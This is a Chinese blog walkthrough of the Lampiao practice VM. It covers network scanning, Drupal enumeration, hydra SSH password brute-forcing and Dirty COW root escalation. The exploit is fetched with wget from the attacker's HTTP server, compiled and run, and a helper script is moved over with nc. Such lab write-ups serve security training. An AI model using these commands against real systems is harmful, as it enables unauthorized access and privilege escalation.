首页 > 其他分享 >Lampiao靶场

Lampiao靶场

时间:2023-05-05 19:35:01浏览次数:45  
标签:查看 Lampiao 10.136 exploit suggester linux 10.10 靶场

Lampiao渗透流程

  1. 靶机下载地址

  2. 主机发现

    • 使用netdiscover进行被动扫描
    netdiscover -i eth0 -r 10.10.10.0/24
    

    img

    • 使用nmap进行主动扫描
    nmap -sS 10.10.10.0/24
    

    img

  3. 对目标主机对主机进行端口扫描

#全端口扫描
nmap -p- 10.10.10.136

img

  1. 查看目标主机的服务版本和操作系统信息
nmap -sS -sV -T5  -A 10.10.10.136
  1. 在浏览器中查看80端口,为静态页面并查看源代码,没有重要信息,接着查看http://10.10.10.136:1898/。
    img

img

  1. 拿到网站后,先大体浏览下,然后进行目录扫描。

    1. 发现页面底部有相关的信息。
      img
      然后进行目录扫描:
      img

    2. 先进入robots.txt文件查看目录结构,看看有没有什么敏感文件。主要查看Disallow部分。
      img
      通过查看/CHANGLOG.txt可以看到Drupal 7.54,2017-02-01

    3. 修改?q=node/1查看一下有没有变换。
      img
      当?q=node/2时,发现了有两个文件地址,其中一个是语音文件,一个是二维码。通过语音文件发现用户名为:tiago。
      img

    img

    img
    扫描二维码,发现没有有用的信息。

    整理搜集到的信息:1. 用户名:tiago;2. Drupal 7.54

  2. 使用kali的cewl,cewl通过爬行网站获取一些关键信息然后创建一个密码字典。

cewl 10.10.10.136:1898 -w password.txt

img

然后对网页登录页面(http://10.10.10.136:1898/index.php)进行弱密码爆破,然后就。。。。
img
发现IP被锁定了,从而说明不存在弱密码爆破漏洞。那就使用hydra对SSh进行弱密码爆破试试。

hydra -l tiago -P password.txt 10.10.10.136 ssh

img
远程ssh登录目标主机,并查看用户权限,发现用户权限为普通用户
img

通过之前的信息收集,发现Drupal 7.54在网上存在相应的漏洞,使用msf进行相关的测试。通过"search cve-2018-7600、search cve-2018-7602或者drupal"查看相关的利用载荷。
img

通过调用pty(pseudo-terminal)模块来创建一个伪终端,并在其中启动一个交互式shell。

python -c 'import pty; pty.spawn("/bin/bash")'

img
可以看到权限仍然很低,查看特殊权限位文件,看看能不能使用suid提权。

find / -perm -u=s -type f 2>/dev/null

查看Linux内核版本

uname -a

脏牛提权
使用searchsploit工具找到提权脚本,并复制在桌面上。

searchsploit dirty

img

img

上传到目标主机上:

  • kali上开启本地http服务
python -m http.server 8888
  • 目标主机下载该利用文件
wget http://10.10.10.128:8888/Desktop/40847.cpp

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o kks 40847.cpp -lutil

-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o kks gcc生成的目标文件,名字为kks
执行gcc编译可执行文件,可直接提权。

img

img

8. 上传漏洞检测脚本
1. 下载漏洞检测脚本
linux-exploit-suggester-2是一款基于Shell脚本的Linux漏洞利用检测工具,旨在快速检测和识别Linux系统中存在的漏洞。

git clone https://github.com/jondonas/linux-exploit-suggester-2.git

2. 上传漏洞检测脚本到目标系统上
在目标系统上:
nc -l 4444 > linux-exploit-suggester-2.pl
在kali上:
nc 10.10.10.136 4444 < /root/Desktop/linux-exploit-suggester-2.pl
在目标系统上为检测脚本添加执行权限并执行

  ```
  chmod +x linux-exploit-suggester-2.pl
  ./linux-exploit-suggester-2.pl
  ```

标签:查看,Lampiao,10.136,exploit,suggester,linux,10.10,靶场
From: https://www.cnblogs.com/kalixcn/p/17375154.html

相关文章

  • sqli 靶场通关(持续更新)
    第一关:Less-1 GET-Errorbased-Singlequotes-String(基于错误的GET单引号字符型注入)手工union联合查询注入一:判断注入类型url=http://127.0.0.2/Less-1/?id=1'看回显的报错信息这里说: '1''LIMIT0,1  这里的1被单引号包裹说明这里是字符型然后 ' 引号闭合......
  • xss-labs靶场
    在线XSS-labs靶场:https://xssaq.com/yx/靶场搭建靶场是直接使用docker搭建的dockerpullvulfocus/xss-labs启动靶场dockerrun-p8005:80vulfocus/xss-labs浏览器访问IP+8005windows搭建使用phpstudy_pro搭建下载地址:https://github.com/do0dl3/xss-labs解压文件......
  • 文件上传漏洞靶场:upload-labs(附在线地址)
    重装系统:CentOS7.6密钥对验证,或密码验证,根据自身情况选择,博主这边为了ssh连接方便选用的密码校验。WindTerm登录系统需提前去云服务器的安全组,开放22端口ssh连接。更新软件yumupdateyumupgradeyum升级这两个命令之间有很小的区别。yumupdate将更新您系统上的软件包,......
  • vulnhub靶场之ADROIT: 1.0.1
    准备:攻击机:虚拟机kali、本机win10。靶机:Adroit:1.0.1,下载地址:https://download.vulnhub.com/adroit/Adroit-v1.0.1.ova,下载后直接vbox打开即可。知识点:shell反弹(jar)、sql注入、简单的代码编写、逆向、dns解析。这个靶场比较推荐,因为之前做的大都是python、php的,这种java类的......
  • vulstack2 靶场做题笔记
    环境配置DCIP:10.10.10.10OS:Windows2012WEB默认初始密码登陆不进去,利用de1ay/1qaz@WSX登陆IP1:10.10.10.80IP2:192.168.111.80OS:Windows2008pcIP1:10.10.10.201IP2:192.168.111.201OS:Windows7攻击机kaliip:192.168.111.130内网网段:10.10.10.0/24......
  • Pwn系列之Protostar靶场 Stack6题解
    源码如下:#include<stdlib.h>#include<unistd.h>#include<stdio.h>#include<string.h>voidgetpath(){charbuffer[64];unsignedintret;printf("inputpathplease:");fflush(stdout);gets(buffer);ret=__b......
  • ICA:1靶场
    ICA:1靶场目录ICA:1靶场一、主机发现二、端口扫描三、渗透提权阶段机器信息:靶机:192.168.142.129攻击机:192.168.142.132一、主机发现arp-scan-l或者nmap-sP192.168.142.0/24二、端口扫描nmap-sV-p-192.168.142.129或者nmap-A-p-192.168.142.129三、渗透提权阶......
  • Lampiao靶场-dirtycow漏洞利用
    Lampiao靶场-dirtycow漏洞利用目录Lampiao靶场-dirtycow漏洞利用一、主机发现二、端口扫描三、目录遍历四、拿到webshell五、实现交互式shell六、暴力破解七、把dirtycow脚本传到靶机八、编译运行dirtycow脚本只是简单记录一下所用工具靶机信息:靶机:192.168.142.132攻击机:192.......
  • 渗透测试靶场及安装
    1.简介什么是渗透测试靶场渗透测试靶场是一个模拟真实网络环境的平台,用于进行安全渗透测试和漏洞攻击的训练。它通常包括多个虚拟机或容器,模拟不同的操作系统、应用程序和网络环境,以便测试人员可以在安全的环境中进行各种攻击和测试。渗透测试靶场可以帮助测试人员提高技能和......
  • pikachu靶场任意文件下载漏洞
    任意文件下载漏洞位置点击链接可以直接下载文件右键选择复制链接使用相对路径进行访问,可以下载任意文件../表示的就是一层目录但是也可以读取一些类型的文件内容如果关闭post提交则会继续下载文件......